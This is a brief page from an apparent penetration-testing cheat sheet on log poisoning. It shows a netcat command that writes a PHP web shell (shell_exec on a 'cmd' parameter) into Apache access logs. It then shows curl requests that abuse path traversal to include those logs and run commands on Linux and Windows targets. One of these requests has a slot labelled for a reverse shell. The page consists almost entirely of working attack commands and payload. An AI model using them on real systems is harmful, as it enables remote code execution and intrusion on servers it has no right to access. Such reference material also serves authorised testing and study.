search

Log poisoning

#Poison logs with netcat

nc 10.10.10.14 80
<?php echo '<pre>' . shell_exec($_GET['cmd'])  . '</pre>'; ?>

#Linux target

curl http://target.com/index.php?view=../../../var/log/apache2/access.log&cmd=INSERT REVSHELL HERE | BASH | PYTHON ...

#Windows target

curl http://target.com/menu.php?file=c:\xamp\apache\logs\access.log&cmd=dir

PreviousHTML application attackNextWireless attacks

Last updated